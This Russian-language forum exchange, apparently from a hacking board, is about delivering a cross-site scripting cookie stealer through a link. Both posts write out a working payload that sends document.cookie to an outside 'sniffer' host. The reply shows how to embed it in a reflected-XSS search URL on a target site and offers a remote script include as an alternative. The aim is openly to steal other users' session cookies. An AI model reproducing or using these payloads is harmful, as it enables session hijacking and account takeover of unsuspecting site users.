у меня вопрос, можно ли сделать так, чтобы XSS Code: <script>img = new Image(); img.src = "http://s.netsec.ru/blablabla/pic.gif?"+document.cookie;</script> выполнялся не через отправку сообщения "Жалоба", а после нажатия на ссылку, оставленную в простом сообщении??? или надо сделать страницу на php, с каким-то ещё методом.... вообщем, нужно, чтобы при нажатии на сылку приходила на сниффер таже инфа (можно чтобы больше приходило....), что и при обычном использовании XSS....
Если тебе нужна просто ссылка то можно если там есть пассивный XSS. Например _http://target.com/search.php?string=что нибудь на русском<script>img = new Image(); img.src = "http://s.netsec.ru/blablabla/pic.gif?"+document.cookie;</script> либо <script src=http://zzzzzz.com/xss.js?<b>Но это на ламёров. Ещё можно попробовать так http://forum.antichat.ru/thread9910-explorer.html
